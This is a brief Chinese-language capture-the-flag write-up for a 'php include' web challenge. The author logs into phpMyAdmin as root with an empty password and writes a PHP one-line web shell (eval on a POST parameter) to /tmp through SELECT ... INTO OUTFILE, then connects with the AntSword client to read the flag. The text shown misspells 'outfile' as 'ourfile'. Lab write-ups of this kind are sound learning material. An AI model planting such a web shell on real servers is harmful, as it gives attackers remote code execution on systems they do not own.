攻防世界-web php include
看了很多大佬的wp,都用的文件包含
我用的是一句话木马下面我给你们详细解释
第一步:咱们用御剑扫描后台发现phpmyadmin后台
第二步:双击它进入登录页面username:root password为空,之后
并进入SQL语句输入的地方,编辑一句话木马并执行select “<?php eval($_POST[aaaa]);?>” into ourfile ‘/tmp/yihua.php’
第三步:打开中国蚁剑输入url地址和密码,测试连接成功之后,添加
第四步:我们就可以发现flag在www目录下面,之后双击打开
第五步:我们就得到了想要的falg。
初入ctf,希望对大家有帮助,觉得好的可以点赞哦。